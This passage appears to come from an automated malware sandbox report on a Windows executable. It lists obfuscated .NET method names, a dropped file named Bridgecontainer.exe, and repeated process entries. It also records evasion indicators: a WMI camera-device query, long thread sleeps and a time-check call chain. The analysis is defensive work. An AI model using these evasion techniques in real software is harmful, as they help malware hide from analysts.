            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, mKidrcAZdhY7mkhg6C.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'GhGb3Ped1Mx3Jt8PyLG', 'y4yQqveyXoJ4dM3eXfm', 'CshTSjek3tG7Ssl0bpM', 'sXlDFQeub5JMhCFQx7k', 'hLQAl2ezqepXAirXkmF', 'rQHyUhTXcNed01UNQqF'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, HTKgZJpIpcSkYwGMxmh.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'obgZfdYEK5NmjD7aYsa', 'spwANuYpPUdylWCMrK2', 'waLWLvY0Grcjs2XFC5J', 'YD9BsrYqaRGumeJXfuZ', 'NuSWKWYLTPPdAAVg688', 'oC0yjMYWWCbHTooG6On'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, q40b0qvZZ4o32yVtLMW.csHigh entropy of concatenated method names: 'h7jQXf2cZj', 'hrYfJ92xOfhqJO9Qjk5', 'lampBR2bgqnIC0mfvrt', 'Y1vyCG2NTuiUVK9y1pN', 'imkmfh2S9VNv8t6e1Jk', 'WoD1YOXJZ9', 'Rai1L7N0k2', 'SYU1MBCCK6', 'mUj1sieGup', 'Mkb1Hh5tmf'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, Q1fACiVWXI9cPxxZvHs.csHigh entropy of concatenated method names: 'dL7ByUlhO0', '_1kO', '_9v4', '_294', 'YldBPfv3VF', 'euj', 'M7XBrIj1LC', 'sfJBgsAsGx', 'o87', 'AG0BfobTh1'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, mjuXJUp4KC1JsSjoSA5.csHigh entropy of concatenated method names: 'Dbq5ySgFEq', 'Gty5PZJN0W', 'pA35rRLiVW', 'Vf6ElDw9p7RsPplEaFo', 'evoQW4wjdTYeV6YjUHV', 'u8fa9LwlN7NaAfJXWBe', 'DdUejwwwjqlF48nOVpA', 'f2g6myw34Ubx1S2F23M', 'P8YbPMwOUAQi7s0a3mH', 'wog2NFwBQRm9w366NYu'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, GAHCQV5aBuZHySbaRwS.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'c2CZHa1vvb', 'hSKZOiHAHC', 'kVBZtuZHyS', 'UaRZawSSa4', 'cXrZ9IBe09', 'HJc7sYSj22TVERP3DpL', 'kP4NKESlSt7GpsjEeZG', 'ULVFaHSY9g3hfYn00nH'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, hmpPZUpKBYYyNq74X9y.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'hsbYXWYb3yDT6W62jv3', 'k96QGRYotbGfU1pnBDF', 'dVUswlYM5GxESmOF55O', 'yCj0V3YUGuuPiVWtHRL', 'eV0bCOY7KHLHskvqd6A', 'ToeNNnYtcwWBomgXfqq'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, NqdnU1vbIFm4BUxpH7I.csHigh entropy of concatenated method names: 'saTI3eZHMt', 'vxkIHZ4mj2', 'e9HIO9bwcx', 'xvZIth5KOs', 'uy6IaYOXFW', 'Wp2I9Pqxn7', 'txaIAj385T', 'E4uICaFflZ', 'IZ2IRShrmw', 'shMIiDsple'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, zHj0GuVqctmcamK9JnX.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, xyJ7CBZeUAS5iu8lpOI.csHigh entropy of concatenated method names: 'gKSrcZkM7W', 'I2ir7NodlQ', 'wodQHkC54qnvpGIKbgL', 'eEmw7xC8y5fUsNQH3sA', 'FbFHtBCdlwTdwqlnWMG', 'a8mMrpCyAbDUGY5bVuI', 'vRNq4PCkpqk6xvdBFS5', 'gl111aCu6ZCvUAJFKY1', 'RwKQ19CzqKNGs9vS8GB', 'U0icG8gXedsTo2hSWsg'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, yYYCbvpD4x5KAP7q72e.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'SZqhyPrA7KcQXO2dFPu', 'N2MdqorQtvPwNLUPj8O', 'blc7pJrcHTwFHthC105', 'kLAaxerakrDKqDuBXPj', 'iFpKIhrsHNdeuQbihXS', 'H8n8a6rZeICTrIpm16n'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, WLuXYZDJ9Txf9KimucL.csHigh entropy of concatenated method names: 'p4l0dVsULg', 'ruC0bbTS8L', 'lAY0FkJDJ5', 'b0j0u1OCm4', 'hxt0wfWQDj', 'si6halUr2f9hecyDJxu', 'hqd2nfUYp5jwLpaMUKx', 'iq0iLXUTjZ2FxJwJfoX', 'QHpZFdUmjY9yHDV9qv2', 'c5AMVDUHqsjN5fGrOZe'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, RYKHDrVLXVgix2V7wRw.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'TQWqgd809E', 'dPDqf6tZ6T', 'GM3qqAF04n', 'zU0qSPF5Rc', 'K0HqNEUgul', 'bqoqBVkCaS', 'nf1tIxqgvXZ1PRJyOiW'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, rRdjeSvnSlDb0kKPneW.csHigh entropy of concatenated method names: '_7zt', 'o20GEDN6xZ', 'utVGcZSoIF', 'tRCG7yDbEA', 'HGAG8hvtwt', 'mtTGytP7st', 'PI6GPcUNAw', 'aBTGrYP7asGVknlT4dh', 'HN7pofPtL02RFje9Q0A', 'LEt6oZPMQwY2opop2sC'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, WGVop2V5evqxtBwsdjK.csHigh entropy of concatenated method names: 'a86f0eb8xQ', 'vrtfe9iP8E', '_8r1', 'q5cf1ABJNS', 'lQCfKVWgOX', 'QYWfQmp598', 'E09fGWviar', 'qssLL8pGLv6iC3qmQFr', 'cfEIeypNc9KjHM8yBtX', 'nCofWMpSoOKpDp8DoAQ'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, rqHtyZpeJN0WXA3RLiV.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'SFLcuCYYZZwlulGco8n', 'NnHnEKYH8Tdn78cJ2fK', 'RrgwTuYjHqkljml7Bq2', 'nksYxVYlxQGghsBh8OV', 'AOJBboY9qjCh4Xqukgr', 'ahZ2RgYw2bXerGyfKR7'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, AJxNwlOUyXB6vrBiZt.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'J1dJS3Kk3wPwZVmgBto', 'L6reLWKuFkabDP9h0r6', 'VJWJQ4KzNnVaOMccdaj', 'BBe1wjeXDpC3G1t1GPW', 'PYs5cve4lLxC8tEylGf', 'Lg8RX0eKNRcByXCEmra'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, TNHnUDv3SNl1iBuo2g2.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, mR6KMHpUpvumT97v7M2.csHigh entropy of concatenated method names: 'YlM5K2iCyN', 'hSf5Q7ikFd', 'o4HUFJ9wEePOI3F6UDL', 'X9Dpsg9lB9wqLUq2xsY', 'rpWZ7d99FXdnePfck2F', 'dn17nv93im493PEMw51', 'coC9yM9OQ6OtnKqeXq4', 'gVR59n9Bpa8fjP4XFEx', 'eKaZq6965QcLFPjv25u', 'UEqW7N9G0ycbGjfabV4'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, PwTiOyZYTTdXuu7sIdY.csHigh entropy of concatenated method names: 'W2Hrhgjplj', 'vfKrxvcsut', 't8arWSisee', 'ackRIbgpNCtBptLm7UH', 'hYfRjAghr21YgQ760JE', 'MmNfQagEbbBbnJxLZCQ', 'vUSMAKg0y5srXTV7OVt', 'YbjP3ngqCDhsUErJHUB', 'eT7UdugLSDHJyuIv28S', 'FELBH2gWlwE4KxHTLfh'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, N4lb1BvyMxMB5trD7m2.csHigh entropy of concatenated method names: 'GAHpAePWglx7nTZoluo', 'glDM2cPJ6M0aJX4fc5U', 'cETiojPVQKtSHtwCcRa', 'b9DydPPqMyVIG9f9omb', 'BMhu9FPLx3t6QlRaNpW'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, wUa6X3zBNZoButV0hi.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'XcumDPreMXlhMoCuYr5', 'o7LYcbrToAEhUROcyuJ', 'p4qFxGrmZXM6UIaXThQ', 'v8sq2prrHjs4NkXV6Mq', 'srv7XnrYNCAHOCcnfQT', 'cHa0uMrHIMRCvsSR6ef'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, S3gRCD5cIvPYpgL7B2v.csHigh entropy of concatenated method names: 'Pj6v6xn4sh', 'r91vIGUGnQ', 'O1nQRg6vrcGAYm6QAmI', 'h1Xana62Nil96C9bO8B', 'u2a08P67LxUksKkr5yW', 'o6QKue6t7cHPMjjR5vC', 'agyTjq6PmpgO1FH9XAm', 'V3ZIFu6nFE7BOk4XGmj', 'VFPZWS6figC9R2b0PVL', 'f2iGCN6Ijij0B1FqdFM'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, eNgiOA5yPFGhAZiswEw.csHigh entropy of concatenated method names: 'F77v7BjB3u', 'KXEv8d0gVq', 'FXuvy8JWDS', 'bwfvPrfgN1', 'aKVvrwr6bU', 'Kj8BNWGXspPyagB1YE0', 'bkcDTgG41VyU3shL2py', 'VLJktP6ufUV1MqtX8sC', 'DjDQV46zYZTwr03J8IE', 'QPl3INGKaFLDtdvSroo'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, lHWFWX5NfUxJIhHDBan.csHigh entropy of concatenated method names: 'eZJv3WotKF', 'jYbv4y0Xoj', 'Yj3vzgRCDI', 'dPYZlpgL7B', 'ovAZpEnN8U', 'rYrZ5VAeJZ', 'HqGZDLw6KM', 'dE0Zv5K1me', 'qnNZZ6ZNgi', 'gfeQYdG83tAIkkGi0xW'
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeFile created: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeJump to dropped file
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeMemory allocated: F50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeMemory allocated: 1AB40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 3600000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 599103Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598328Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597234Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597125Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596906Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596797Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596469Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeThread delayed: delay time: 596250Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeWindow / User API: threadDelayed 7776Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeWindow / User API: threadDelayed 2035Jump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23035
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -13835058055282155s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -3600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -599103s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -598766s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -598656s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -598547s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -598437s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -598328s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -597891s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -597672s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136Thread sleep time: -597453s >= -30000sJump to behavior
